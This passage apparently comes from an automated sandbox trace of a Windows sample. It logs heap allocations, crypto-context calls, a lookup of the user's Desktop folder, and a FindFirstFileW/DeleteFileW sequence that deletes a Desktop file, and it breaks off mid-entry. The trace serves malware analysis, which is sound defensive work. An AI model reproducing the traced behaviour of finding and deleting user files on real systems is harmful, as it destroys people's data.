cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0188.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.989] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0188.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0188.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.990] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.992] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.992] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0188.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.992] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.993] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.993] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.994] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.995] FreeLibrary (hLibModule=0x74d40000) returned 1 [0188.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.995] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.995] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.995] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.997] CloseHandle (hObject=0x294) returned 1 [0188.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.001] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0189.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0189.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0189.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0189.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0189.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.003] CloseHandle (hObject=0x268) returned 1 [0189.008] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0189.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.009] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.009] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0189.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.010] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0189.010] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/QzBYTrrsKyNkrz7Qz2.swf", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QzBYTrrsKyNkrz7Qz2.swf", lpFilePart=0x8bedfc*="QzBYTrrsKyNkrz7Qz2.swf") returned 0x3c [0189.010] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QzBYTrrsKyNkrz7Qz2.swf", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6b6db0, ftCreationTime.dwHighDateTime=0x1d4d324, ftLastAccessTime.dwLowDateTime=0xeb9330c0, ftLastAccessTime.dwHighDateTime=0x1d4cca1, ftLastWriteTime.dwLowDateTime=0xeb9330c0, ftLastWriteTime.dwHighDateTime=0x1d4cca1, nFileSizeHigh=0x0, nFileSizeLow=0x178b5, dwReserved0=0x75, dwReserved1=0x4, cFileName="QzBYTrrsKyNkrz7Qz2.swf", cAlternateFileName="QZBYTR~1.SWF")) returned 0xaa58a0 [0189.010] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QzBYTrrsKyNkrz7Qz2.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qzbytrrskynkrz7qz2.swf")) returned 1 [0189.012] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6b6db0, ftCreationTime.dwHighDateTime=0x1d4d324, ftLastAccessTime.dwLowDateTime=0xeb9330c0, ftLastAccessTime.dwHighDateTime=0x1d4cca1, ftLastWriteTime.dwLowDateTime=0xeb9330c0, ftLastWriteTime.dwHighDateTime=0x1d4cca1, nFileSizeHigh=0x0, 